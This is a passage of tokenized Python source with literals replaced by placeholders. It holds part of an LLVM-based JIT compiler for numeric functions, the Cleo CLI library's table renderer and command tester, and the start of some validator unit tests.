<EOL> raise NotImplementedError <EOL> def visit_LitInt ( self , node ) : <EOL> ty = self . specialize ( node ) <EOL> if ty is double_type : <EOL> return Constant . real ( double_type , node . n ) <EOL> elif ty == int_type : <EOL> return Constant . int ( int_type , node . n ) <EOL> def visit_LitFloat ( self , node ) : <EOL> ty = self . specialize ( node ) <EOL> if ty is double_type : <EOL> return Constant . real ( double_type , node . n ) <EOL> elif ty == int_type : <EOL> return Constant . int ( int_type , node . n ) <EOL> def visit_Noop ( self , node ) : <EOL> pass <EOL> def visit_Fun ( self , node ) : <EOL> rettype = to_lltype ( self . retty ) <EOL> argtypes = map ( to_lltype , self . argtys ) <EOL> func_name = mangler ( node . fname , self . argtys ) <EOL> self . start_function ( func_name , module , rettype , argtypes ) <EOL> for ( ar , llarg , argty ) in zip ( node . args , self . function . args , self . argtys ) : <EOL> name = ar . id <EOL> llarg . name = name <EOL> if is_array ( argty ) : <EOL> zero = self . const ( <NUM_LIT:0> ) <EOL> one = self . const ( <NUM_LIT:1> ) <EOL> two = self . const ( <NUM_LIT:2> ) <EOL> data = self . builder . gep ( llarg , [ <EOL> zero , zero ] , name = ( name + '<STR_LIT>' ) ) <EOL> dims = self . builder . gep ( llarg , [ <EOL> zero , one ] , name = ( name + '<STR_LIT>' ) ) <EOL> shape = self . builder . gep ( llarg , [ <EOL> zero , two ] , name = ( name + '<STR_LIT>' ) ) <EOL> self . arrays [ name ] [ '<STR_LIT:data>' ] = self . builder . load ( data ) <EOL> self . arrays [ name ] [ '<STR_LIT>' ] = self . builder . load ( dims ) <EOL> self . arrays [ name ] [ '<STR_LIT>' ] = self . builder . load ( shape ) <EOL> self . locals [ name ] = llarg <EOL> else : <EOL> argref = self . builder . alloca ( to_lltype ( argty ) ) <EOL> self . builder . store ( llarg , argref ) <EOL> self . locals [ name ] = argref <EOL> if rettype is not void_type : <EOL> self . locals [ '<STR_LIT>' ] = self . builder . alloca ( rettype , name = "<STR_LIT>" ) <EOL> map ( self . visit , node . body ) <EOL> self . end_function ( ) <EOL> def visit_Index ( self , node ) : <EOL> if isinstance ( node . val , Var ) and node . val . id in self . arrays : <EOL> val = self . visit ( node . val ) <EOL> ix = self . visit ( node . ix ) <EOL> dataptr = self . arrays [ node . val . id ] [ '<STR_LIT:data>' ] <EOL> ret = self . builder . gep ( dataptr , [ ix ] ) <EOL> return self . builder . load ( ret ) <EOL> else : <EOL> val = self . visit ( node . val ) <EOL> ix = self . visit ( node . ix ) <EOL> ret = self . builder . gep ( val , [ ix ] ) <EOL> return self . builder . load ( ret ) <EOL> def visit_Var ( self , node ) : <EOL> return self . builder . load ( self . locals [ node . id ] ) <EOL> def visit_Return ( self , node ) : <EOL> val = self . visit ( node . val ) <EOL> if val . type != void_type : <EOL> self . builder . store ( val , self . locals [ '<STR_LIT>' ] ) <EOL> self . builder . branch ( self . exit_block ) <EOL> def visit_Loop ( self , node ) : <EOL> init_block = self . function . append_basic_block ( '<STR_LIT>' ) <EOL> test_block = self . function . append_basic_block ( '<STR_LIT>' ) <EOL> body_block = self . function . append_basic_block ( '<STR_LIT>' ) <EOL> end_block = self . function . append_basic_block ( "<STR_LIT>" ) <EOL> self . branch ( init_block ) <EOL> self . set_block ( init_block ) <EOL> start = self . visit ( node . begin ) <EOL> stop = self . visit ( node . end ) <EOL> step = <NUM_LIT:1> <EOL> varname = node . var . id <EOL> inc = self . builder . alloca ( int_type , name = varname ) <EOL> self . builder . store ( start , inc ) <EOL> self . locals [ varname ] = inc <EOL> self . branch ( test_block ) <EOL> self . set_block ( test_block ) <EOL> cond = self . builder . icmp ( lc . ICMP_SLT , self . builder . load ( inc ) , stop ) <EOL> self . builder . cbranch ( cond , body_block , end_block ) <EOL> self . set_block ( body_block ) <EOL> map ( self . visit , node . body ) <EOL> succ = self . builder . add ( self . const ( step ) , self . builder . load ( inc ) ) <EOL> self . builder . store ( succ , inc ) <EOL> self . builder . branch ( test_block ) <EOL> self . set_block ( end_block ) <EOL> def visit_Prim ( self , node ) : <EOL> if node . fn == "<STR_LIT>" : <EOL> ref = node . args [ <NUM_LIT:0> ] <EOL> shape = self . arrays [ ref . id ] [ '<STR_LIT>' ] <EOL> return shape <EOL> elif node . fn == "<STR_LIT>" : <EOL> a = self . visit ( node . args [ <NUM_LIT:0> ] ) <EOL> b = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> if a . type == double_type : <EOL> return self . builder . fmul ( a , b ) <EOL> else : <EOL> return self . builder . mul ( a , b ) <EOL> elif node . fn == "<STR_LIT>" : <EOL> a = self . visit ( node . args [ <NUM_LIT:0> ] ) <EOL> b = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> if a . type == double_type : <EOL> return self . builder . fadd ( a , b ) <EOL> else : <EOL> return self . builder . add ( a , b ) <EOL> else : <EOL> raise NotImplementedError <EOL> def visit_Assign ( self , node ) : <EOL> if node . ref in self . locals : <EOL> name = node . ref <EOL> var = self . locals [ name ] <EOL> val = self . visit ( node . val ) <EOL> self . builder . store ( val , var ) <EOL> self . locals [ name ] = var <EOL> return var <EOL> else : <EOL> name = node . ref <EOL> val = self . visit ( node . val ) <EOL> ty = self . specialize ( node ) <EOL> var = self . builder . alloca ( ty , name = name ) <EOL> self . builder . store ( val , var ) <EOL> self . locals [ name ] = var <EOL> return var <EOL> def visit ( self , node ) : <EOL> name = "<STR_LIT>" % type ( node ) . __name__ <EOL> if hasattr ( self , name ) : <EOL> return getattr ( self , name ) ( node ) <EOL> else : <EOL> return self . generic_visit ( node ) <EOL> _nptypemap = { <EOL> '<STR_LIT:i>' : ctypes . c_int , <EOL> '<STR_LIT:f>' : ctypes . c_float , <EOL> '<STR_LIT:d>' : ctypes . c_double , <EOL> } <EOL> def mangler ( fname , sig ) : <EOL> return fname + str ( hash ( tuple ( sig ) ) ) <EOL> def wrap_module ( sig , llfunc ) : <EOL> pfunc = wrap_function ( llfunc , engine ) <EOL> dispatch = dispatcher ( pfunc ) <EOL> return dispatch <EOL> def wrap_function ( func , engine ) : <EOL> args = func . type . pointee . args <EOL> ret_type = func . type . pointee . return_type <EOL> ret_ctype = wrap_type ( ret_type ) <EOL> args_ctypes = map ( wrap_type , args ) <EOL> functype = ctypes . CFUNCTYPE ( ret_ctype , * args_ctypes ) <EOL> fptr = engine . get_pointer_to_function ( func ) <EOL> cfunc = functype ( fptr ) <EOL> cfunc . __name__ = func . name <EOL> return cfunc <EOL> def wrap_type ( llvm_type ) : <EOL> kind = llvm_type . kind <EOL> if kind == lc . TYPE_INTEGER : <EOL> ctype = getattr ( ctypes , "<STR_LIT>" + str ( llvm_type . width ) ) <EOL> elif kind == lc . TYPE_DOUBLE : <EOL> ctype = ctypes . c_double <EOL> elif kind == lc . TYPE_FLOAT : <EOL> ctype = ctypes . c_float <EOL> elif kind == lc . TYPE_VOID : <EOL> ctype = None <EOL> elif kind == lc . TYPE_POINTER : <EOL> pointee = llvm_type . pointee <EOL> p_kind = pointee . kind <EOL> if p_kind == lc . TYPE_INTEGER : <EOL> width = pointee . width <EOL> if width == <NUM_LIT:8> : <EOL> ctype = ctypes . c_char_p <EOL> else : <EOL> ctype = ctypes . POINTER ( wrap_type ( pointee ) ) <EOL> elif p_kind == lc . TYPE_VOID : <EOL> ctype = ctypes . c_void_p <EOL> else : <EOL> ctype = ctypes . POINTER ( wrap_type ( pointee ) ) <EOL> elif kind == lc . TYPE_STRUCT : <EOL> struct_name = llvm_type . name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> struct_name = struct_name . encode ( '<STR_LIT:ascii>' ) <EOL> struct_type = None <EOL> if struct_type and issubclass ( struct_type , ctypes . Structure ) : <EOL> return struct_type <EOL> if hasattr ( struct_type , '<STR_LIT>' ) : <EOL> names = struct_type . _fields_ <EOL> else : <EOL> names = [ "<STR_LIT>" + str ( n ) for n in range ( llvm_type . element_count ) ] <EOL> ctype = type ( ctypes . Structure ) ( struct_name , ( ctypes . Structure , ) , <EOL> { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> fields = [ ( name , wrap_type ( elem ) ) <EOL> for name , elem in zip ( names , llvm_type . elements ) ] <EOL> setattr ( ctype , '<STR_LIT>' , fields ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % kind ) <EOL> return ctype <EOL> def wrap_ndarray ( na ) : <EOL> ctype = _nptypemap [ na . dtype . char ] <EOL> _shape = list ( na . shape ) <EOL> data = na . ctypes . data_as ( ctypes . POINTER ( ctype ) ) <EOL> dims = len ( na . strides ) <EOL> shape = ( ctypes . c_int * dims ) ( * _shape ) <EOL> return ( data , dims , shape ) <EOL> def wrap_arg ( arg , val ) : <EOL> if isinstance ( val , np . ndarray ) : <EOL> ndarray = arg . _type_ <EOL> data , dims , shape = wrap_ndarray ( val ) <EOL> return ndarray ( data , dims , shape ) <EOL> else : <EOL> return val <EOL> def dispatcher ( fn ) : <EOL> def _call_closure ( * args ) : <EOL> cargs = list ( fn . _argtypes_ ) <EOL> pargs = list ( args ) <EOL> rargs = map ( wrap_arg , cargs , pargs ) <EOL> return fn ( * rargs ) <EOL> _call_closure . __name__ = fn . __name__ <EOL> return _call_closure <EOL> module = lc . Module . new ( '<STR_LIT>' ) <EOL> engine = None <EOL> function_cache = { } <EOL> tm = le . TargetMachine . new ( features = '<STR_LIT>' , cm = le . CM_JITDEFAULT ) <EOL> eb = le . EngineBuilder . new ( module ) <EOL> engine = eb . create ( tm ) <EOL> def autojit ( fn ) : <EOL> transformer = PythonVisitor ( ) <EOL> ast = transformer ( fn ) <EOL> ( ty , mgu ) = typeinfer ( ast ) <EOL> debug ( dump ( ast ) ) <EOL> return specialize ( ast , ty , mgu ) <EOL> def arg_pytype ( arg ) : <EOL> if isinstance ( arg , np . ndarray ) : <EOL> if arg . dtype == np . dtype ( '<STR_LIT>' ) : <EOL> return array ( int32 ) <EOL> elif arg . dtype == np . dtype ( '<STR_LIT>' ) : <EOL> return array ( int64 ) <EOL> elif arg . dtype == np . dtype ( '<STR_LIT>' ) : <EOL> return array ( double64 ) <EOL> elif arg . dtype == np . dtype ( '<STR_LIT:float>' ) : <EOL> return array ( float32 ) <EOL> elif isinstance ( arg , int ) & ( arg < sys . maxint ) : <EOL> return int64 <EOL> elif isinstance ( arg , float ) : <EOL> return double64 <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % type ( arg ) ) <EOL> def specialize ( ast , infer_ty , mgu ) : <EOL> def _wrapper ( * args ) : <EOL> types = map ( arg_pytype , list ( args ) ) <EOL> spec_ty = TFun ( argtys = types , retty = TVar ( "<STR_LIT>" ) ) <EOL> unifier = unify ( infer_ty , spec_ty ) <EOL> specializer = compose ( unifier , mgu ) <EOL> retty = apply ( specializer , TVar ( "<STR_LIT>" ) ) <EOL> argtys = [ apply ( specializer , ty ) for ty in types ] <EOL> debug ( '<STR_LIT>' , TFun ( argtys , retty ) ) <EOL> if determined ( retty ) and all ( map ( determined , argtys ) ) : <EOL> key = mangler ( ast . fname , argtys ) <EOL> if key in function_cache : <EOL> return function_cache [ key ] ( * args ) <EOL> else : <EOL> llfunc = codegen ( ast , specializer , retty , argtys ) <EOL> pyfunc = wrap_module ( argtys , llfunc ) <EOL> function_cache [ key ] = pyfunc <EOL> return pyfunc ( * args ) <EOL> else : <EOL> raise UnderDeteremined ( ) <EOL> return _wrapper <EOL> def typeinfer ( ast ) : <EOL> infer = TypeInfer ( ) <EOL> ty = infer . visit ( ast ) <EOL> mgu = solve ( infer . constraints ) <EOL> infer_ty = apply ( mgu , ty ) <EOL> debug ( infer_ty ) <EOL> debug ( mgu ) <EOL> debug ( infer . constraints ) <EOL> return ( infer_ty , mgu ) <EOL> def codegen ( ast , specializer , retty , argtys ) : <EOL> cgen = LLVMEmitter ( specializer , retty , argtys ) <EOL> mod = cgen . visit ( ast ) <EOL> cgen . function . verify ( ) <EOL> tm = le . TargetMachine . new ( opt = <NUM_LIT:3> , cm = le . CM_JITDEFAULT , features = '<STR_LIT>' ) <EOL> pms = lp . build_pass_managers ( tm = tm , <EOL> fpm = False , <EOL> mod = module , <EOL> opt = <NUM_LIT:3> , <EOL> vectorize = False , <EOL> loop_vectorize = True ) <EOL> pms . pm . run ( module ) <EOL> debug ( cgen . function ) <EOL> debug ( module . to_native_assembly ( ) ) <EOL> return cgen . function <EOL> def debug ( fmt , * args ) : <EOL> if DEBUG : <EOL> print ( '<STR_LIT:=>' * <NUM_LIT> ) <EOL> print ( fmt , * args ) </s>
<s> from __future__ import division <EOL> from collections import OrderedDict <EOL> from . . exceptions import CleoException <EOL> from . table_style import TableStyle <EOL> from . table_cell import TableCell <EOL> from . table_separator import TableSeparator <EOL> from . helper import Helper <EOL> class Table ( object ) : <EOL> """<STR_LIT>""" <EOL> styles = None <EOL> def __init__ ( self , output ) : <EOL> """<STR_LIT>""" <EOL> self . _output = output <EOL> self . _headers = [ ] <EOL> self . _rows = [ ] <EOL> self . _column_widths = { } <EOL> self . _number_of_columns = None <EOL> self . _style = None <EOL> self . _column_styles = { } <EOL> if not self . __class__ . styles : <EOL> self . __class__ . styles = self . _init_styles ( ) <EOL> self . set_style ( '<STR_LIT:default>' ) <EOL> @ classmethod <EOL> def set_style_definition ( cls , name , table_style ) : <EOL> """<STR_LIT>""" <EOL> if not cls . styles : <EOL> cls . styles = cls . _init_styles ( ) <EOL> cls . styles [ name ] = table_style <EOL> def set_style ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( name , TableStyle ) : <EOL> self . _style = name <EOL> elif name in self . styles : <EOL> self . _style = self . styles [ name ] <EOL> else : <EOL> raise CleoException ( '<STR_LIT>' % name ) <EOL> return self <EOL> def get_style ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _style <EOL> def set_column_style ( self , column_index , name ) : <EOL> """<STR_LIT>""" <EOL> column_index = int ( column_index ) <EOL> if isinstance ( name , TableStyle ) : <EOL> self . _column_styles [ column_index ] = name <EOL> elif name in self . styles : <EOL> self . _column_styles [ column_index ] = self . styles [ name ] <EOL> else : <EOL> raise CleoException ( '<STR_LIT>' % name ) <EOL> def get_column_style ( self , column_index ) : <EOL> """<STR_LIT>""" <EOL> if column_index in self . _column_styles : <EOL> return self . _column_styles [ column_index ] <EOL> return self . _style <EOL> def set_headers ( self , headers ) : <EOL> if headers and not isinstance ( headers [ <NUM_LIT:0> ] , list ) : <EOL> headers = [ headers ] <EOL> self . _headers = headers <EOL> return self <EOL> def set_rows ( self , rows ) : <EOL> self . _rows = [ ] <EOL> self . add_rows ( rows ) <EOL> return self <EOL> def add_rows ( self , rows ) : <EOL> for row in rows : <EOL> self . add_row ( row ) <EOL> return self <EOL> def add_row ( self , row ) : <EOL> if isinstance ( row , TableSeparator ) : <EOL> self . _rows . append ( row ) <EOL> return self <EOL> if not isinstance ( row , list ) : <EOL> raise CleoException ( '<STR_LIT>' ) <EOL> self . _rows . append ( row ) <EOL> return self <EOL> def set_row ( self , column , row ) : <EOL> self . _rows [ column ] = row <EOL> return self <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _calculate_number_of_columns ( ) <EOL> rows = self . _build_table_rows ( self . _rows ) <EOL> headers = self . _build_table_rows ( self . _headers ) <EOL> self . _calculate_columns_width ( headers + rows ) <EOL> self . _render_row_separator ( ) <EOL> if headers : <EOL> for header in headers : <EOL> self . _render_row ( header , self . _style . cell_header_format ) <EOL> self . _render_row_separator ( ) <EOL> for row in rows : <EOL> if isinstance ( row , TableSeparator ) : <EOL> self . _render_row_separator ( ) <EOL> else : <EOL> self . _render_row ( row , self . _style . cell_row_format ) <EOL> if rows : <EOL> self . _render_row_separator ( ) <EOL> self . _cleanup ( ) <EOL> def _render_row_separator ( self ) : <EOL> """<STR_LIT>""" <EOL> count = self . _number_of_columns <EOL> if not count : <EOL> return <EOL> if not self . _style . horizontal_border_char and not self . _style . crossing_char : <EOL> return <EOL> markup = self . _style . crossing_char <EOL> for column in range ( <NUM_LIT:0> , count ) : <EOL> markup += self . _style . horizontal_border_char * self . _column_widths [ column ] + self . _style . crossing_char <EOL> self . _output . writeln ( self . _style . border_format % markup ) <EOL> def _render_column_separator ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _output . write ( self . _style . border_format % self . _style . vertical_border_char ) <EOL> def _render_row ( self , row , cell_format ) : <EOL> """<STR_LIT>""" <EOL> if not row : <EOL> return <EOL> self . _render_column_separator ( ) <EOL> for column in self . _get_row_columns ( row ) : <EOL> self . _render_cell ( row , column , cell_format ) <EOL> self . _render_column_separator ( ) <EOL> self . _output . writeln ( '<STR_LIT>' ) <EOL> def _render_cell ( self , row , column , cell_format ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cell = row [ column ] <EOL> except IndexError : <EOL> cell = '<STR_LIT>' <EOL> width = self . _column_widths [ column ] <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> for next_column in range ( column + <NUM_LIT:1> , column + cell . colspan ) : <EOL> width += self . _get_column_separator_width ( ) + self . _column_widths [ next_column ] <EOL> width += len ( cell ) - Helper . len ( cell ) <EOL> style = self . get_column_style ( column ) <EOL> if isinstance ( cell , TableSeparator ) : <EOL> self . _output . write ( style . border_format % ( style . horizontal_border_char * width ) ) <EOL> else : <EOL> width += Helper . len ( cell ) - Helper . len_without_decoration ( self . _output . get_formatter ( ) , cell ) <EOL> content = style . cell_row_content_format % cell <EOL> self . _output . write ( cell_format % getattr ( content , style . pad_type ) ( width , style . padding_char ) ) <EOL> def _calculate_number_of_columns ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _number_of_columns is not None : <EOL> return <EOL> columns = [ <NUM_LIT:0> ] <EOL> for row in self . _headers + self . _rows : <EOL> if isinstance ( row , TableSeparator ) : <EOL> continue <EOL> columns . append ( self . _get_number_of_columns ( row ) ) <EOL> self . _number_of_columns = max ( columns ) <EOL> def _build_table_rows ( self , rows ) : <EOL> unmerged_rows = OrderedDict ( ) <EOL> row_key = <NUM_LIT:0> <EOL> while row_key < len ( rows ) : <EOL> rows = self . _fill_next_rows ( rows , row_key ) <EOL> for column , cell in enumerate ( rows [ row_key ] ) : <EOL> if '<STR_LIT:\n>' not in cell : <EOL> continue <EOL> lines = cell . split ( '<STR_LIT:\n>' ) <EOL> for line_key , line in enumerate ( lines ) : <EOL> if isinstance ( cell , TableCell ) : <EOL> line = TableCell ( line , colspan = cell . colspan ) <EOL> if <NUM_LIT:0> == line_key : <EOL> rows [ row_key ] [ column ] = line <EOL> else : <EOL> if row_key not in unmerged_rows : <EOL> unmerged_rows [ row_key ] = OrderedDict ( ) <EOL> if line_key not in unmerged_rows [ row_key ] : <EOL> unmerged_rows [ row_key ] [ line_key ] = OrderedDict ( ) <EOL> unmerged_rows [ row_key ] [ line_key ] [ column ] = line <EOL> row_key += <NUM_LIT:1> <EOL> table_rows = [ ] <EOL> for row_key , row in enumerate ( rows ) : <EOL> table_rows . append ( self . _fill_cells ( row ) ) <EOL> if row_key in unmerged_rows : <EOL> for line in unmerged_rows [ row_key ] : <EOL> if line <= len ( table_rows ) : <EOL> new_row = [ ] <EOL> for column , value in enumerate ( row ) : <EOL> if column in unmerged_rows [ row_key ] [ line ] : <EOL> new_row . append ( unmerged_rows [ row_key ] [ line ] [ column ] ) <EOL> else : <EOL> new_row . append ( '<STR_LIT>' ) <EOL> table_rows . append ( new_row ) <EOL> else : <EOL> for column in unmerged_rows [ row_key ] [ line ] : <EOL> table_rows [ line ] [ column ] = unmerged_rows [ row_key ] [ line ] [ column ] <EOL> return table_rows <EOL> def _fill_next_rows ( self , rows , line ) : <EOL> """<STR_LIT>""" <EOL> unmerged_rows = OrderedDict ( ) <EOL> for column , cell in enumerate ( rows [ line ] ) : <EOL> if isinstance ( cell , TableCell ) and cell . rowspan > <NUM_LIT:1> : <EOL> nb_lines = cell . rowspan - <NUM_LIT:1> <EOL> lines = [ cell ] <EOL> if '<STR_LIT:\n>' in cell : <EOL> lines = cell . split ( '<STR_LIT:\n>' ) <EOL> if len ( lines ) > nb_lines : <EOL> nb_lines = cell . count ( '<STR_LIT:\n>' ) <EOL> rows [ line ] [ column ] = TableCell ( lines [ <NUM_LIT:0> ] , colspan = cell . colspan ) <EOL> placeholder = OrderedDict ( [ ( k , OrderedDict ( ) ) for k in range ( line + <NUM_LIT:1> , line + <NUM_LIT:1> + nb_lines ) ] ) <EOL> for k , v in unmerged_rows . items ( ) : <EOL> if k in placeholder : <EOL> for l , m in unmerged_rows [ k ] . items ( ) : <EOL> if l in placeholder [ k ] : <EOL> placeholder [ k ] [ l ] . update ( m ) <EOL> else : <EOL> placeholder [ k ] [ l ] = m <EOL> else : <EOL> placeholder [ k ] = v <EOL> unmerged_rows = placeholder <EOL> for unmerged_row_key , unmerged_row in unmerged_rows . items ( ) : <EOL> value = '<STR_LIT>' <EOL> if unmerged_row_key - line < len ( lines ) : <EOL> value = lines [ unmerged_row_key - line ] <EOL> unmerged_rows [ unmerged_row_key ] [ column ] = TableCell ( value , colspan = cell . colspan ) <EOL> for unmerged_row_key , unmerged_row in unmerged_rows . items ( ) : <EOL> if ( unmerged_row_key < len ( rows ) <EOL> and isinstance ( rows [ unmerged_row_key ] , list ) <EOL> and ( self . _get_number_of_columns ( rows [ unmerged_row_key ] ) <EOL> + self . _get_number_of_columns ( list ( unmerged_rows [ unmerged_row_key ] . values ( ) ) ) <EOL> <= self . _number_of_columns ) ) : <EOL> for cell_key , cell in unmerged_row . items ( ) : <EOL> rows [ unmerged_row_key ] . insert ( cell_key , cell ) <EOL> else : <EOL> row = self . _copy_row ( rows , unmerged_row_key - <NUM_LIT:1> ) <EOL> for column , cell in unmerged_row . items ( ) : <EOL> if len ( cell ) : <EOL> row [ column ] = unmerged_row [ column ] <EOL> rows . insert ( unmerged_row_key , row ) <EOL> return rows <EOL> def _fill_cells ( self , row ) : <EOL> """<STR_LIT>""" <EOL> new_row = [ ] <EOL> for column , cell in enumerate ( row ) : <EOL> new_row . append ( cell ) <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> for position in range ( column + <NUM_LIT:1> , column + cell . colspan ) : <EOL> new_row . append ( '<STR_LIT>' ) <EOL> if new_row : <EOL> return new_row <EOL> return row <EOL> def _copy_row ( self , rows , line ) : <EOL> """<STR_LIT>""" <EOL> row = [ x for x in rows [ line ] ] <EOL> for cell_key , cell_value in enumerate ( row ) : <EOL> row [ cell_key ] = '<STR_LIT>' <EOL> if isinstance ( cell_value , TableCell ) : <EOL> row [ cell_key ] = TableCell ( '<STR_LIT>' , colspan = cell_value . colspan ) <EOL> return row <EOL> def _get_number_of_columns ( self , row ) : <EOL> """<STR_LIT>""" <EOL> columns = len ( row ) <EOL> for column in row : <EOL> if isinstance ( column , TableCell ) : <EOL> columns += column . colspan - <NUM_LIT:1> <EOL> return columns <EOL> def _get_row_columns ( self , row ) : <EOL> """<STR_LIT>""" <EOL> columns = list ( range ( <NUM_LIT:0> , self . _number_of_columns ) ) <EOL> for cell_key , cell in enumerate ( row ) : <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> columns = [ x for x in columns if x not in list ( range ( cell_key + <NUM_LIT:1> , cell_key + cell . colspan ) ) ] <EOL> return columns <EOL> def _calculate_columns_width ( self , rows ) : <EOL> """<STR_LIT>""" <EOL> for column in range ( <NUM_LIT:0> , self . _number_of_columns ) : <EOL> lengths = [ ] <EOL> for row in rows : <EOL> if isinstance ( row , TableSeparator ) : <EOL> continue <EOL> lengths . append ( self . _get_cell_width ( row , column ) ) <EOL> self . _column_widths [ column ] = max ( lengths ) + len ( self . _style . cell_row_content_format ) - <NUM_LIT:2> <EOL> def _get_column_separator_width ( self ) : <EOL> return len ( self . _style . border_format % self . _style . vertical_border_char ) <EOL> def _get_cell_width ( self , row , column ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cell = row [ column ] <EOL> cell_width = Helper . len_without_decoration ( self . _output . get_formatter ( ) , cell ) <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> cell_width = cell_width // cell . colspan <EOL> return cell_width <EOL> except IndexError : <EOL> return <NUM_LIT:0> <EOL> def _cleanup ( self ) : <EOL> self . _column_widths = { } <EOL> self . _number_of_columns = None <EOL> @ classmethod <EOL> def _init_styles ( cls ) : <EOL> borderless = TableStyle ( ) <EOL> borderless . set_horizontal_border_char ( '<STR_LIT:=>' ) <EOL> borderless . set_vertical_border_char ( '<STR_LIT:U+0020>' ) <EOL> borderless . set_crossing_char ( '<STR_LIT:U+0020>' ) <EOL> compact = TableStyle ( ) <EOL> compact . set_horizontal_border_char ( '<STR_LIT>' ) <EOL> compact . set_vertical_border_char ( '<STR_LIT:U+0020>' ) <EOL> compact . set_crossing_char ( '<STR_LIT>' ) <EOL> compact . set_cell_row_content_format ( '<STR_LIT:%s>' ) <EOL> return { <EOL> '<STR_LIT:default>' : TableStyle ( ) , <EOL> '<STR_LIT>' : borderless , <EOL> '<STR_LIT>' : compact <EOL> } </s>
<s> from io import BytesIO <EOL> from . . inputs . list_input import ListInput <EOL> from . . outputs . stream_output import StreamOutput <EOL> class CommandTester ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , command ) : <EOL> """<STR_LIT>""" <EOL> self . __command = command <EOL> self . __input = None <EOL> self . __output = None <EOL> def execute ( self , input_ , options = None ) : <EOL> """<STR_LIT>""" <EOL> options = options or { } <EOL> self . __input = ListInput ( input_ ) <EOL> if '<STR_LIT>' in options : <EOL> self . __input . set_interactive ( options [ '<STR_LIT>' ] ) <EOL> self . __output = StreamOutput ( BytesIO ( ) ) <EOL> if '<STR_LIT>' in options : <EOL> self . __output . set_decorated ( options [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in options : <EOL> self . __output . set_verbosity ( options [ '<STR_LIT>' ] ) <EOL> return self . __command . run ( self . __input , self . __output ) <EOL> def get_display ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __output . get_stream ( ) . seek ( <NUM_LIT:0> ) <EOL> return self . __output . get_stream ( ) . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> def get_input ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __input <EOL> def get_output ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __output </s>
<s> from cleo . commands import Command <EOL> class FoobarCommand ( Command ) : <EOL> def configure ( self ) : <EOL> self . set_name ( '<STR_LIT>' ) . set_description ( '<STR_LIT>' ) <EOL> def execute ( self , input_ , output_ ) : <EOL> self . input = input_ <EOL> self . output = output_ </s>
<s> from . . import CleoTestCase <EOL> from cleo . validators import ( <EOL> Validator , ValidationError , <EOL> Boolean , Enum , Choice , Callable , <EOL> Integer , Float , Range <EOL> ) <EOL> class ValidatorTestCase ( CleoTestCase ) : <EOL> def test_is_valid ( self ) : <EOL> """<STR_LIT>""" <EOL> validator = Validator ( ) <EOL> validator . validate = self . mock ( ) . MagicMock ( return_value = True ) <EOL> self . assertTrue ( validator . is_valid ( '<STR_LIT:foo>' ) ) <EOL> validator . validate = self . mock ( ) . MagicMock ( return_value = False ) <EOL> self . assertTrue ( validator . is_valid ( '<STR_LIT:foo>' ) ) <EOL> def test_error ( self ) : <EOL> validator = Validator ( ) <EOL> validator . name = '<STR_LIT:foo>' <EOL> self . assertRaises ( ValidationError , validator . error , '<STR_LIT:foo>' ) <EOL> class BooleanTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Boolean ( ) <EOL> self . assertTrue ( validator . validate ( True ) ) <EOL> self . assertFalse ( validator . validate ( False ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:1>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT:0>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:true>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT:false>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:yes>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:y>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT:n>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( ValidationError , validator . validate , '<STR_LIT:foo>' ) <EOL> class EnumTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Enum ( [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , validator . validate ( '<STR_LIT:foo>' ) ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , validator . validate ( '<STR_LIT:bar>' ) ) <EOL> self . assertEqual ( '<STR_LIT>' , validator . validate ( '<STR_LIT>' ) ) <EOL> try : <EOL> validator . validate ( '<STR_LIT>' ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except ValidationError as e : <EOL> self . assertRegex ( <EOL> str ( e ) , <EOL> '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . join ( map ( repr , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] ) ) <EOL> ) <EOL> class ChoiceTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Choice ( [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , validator . validate ( '<STR_LIT:foo>' ) ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , validator . validate ( '<STR_LIT:bar>' ) ) <EOL> self . assertEqual ( 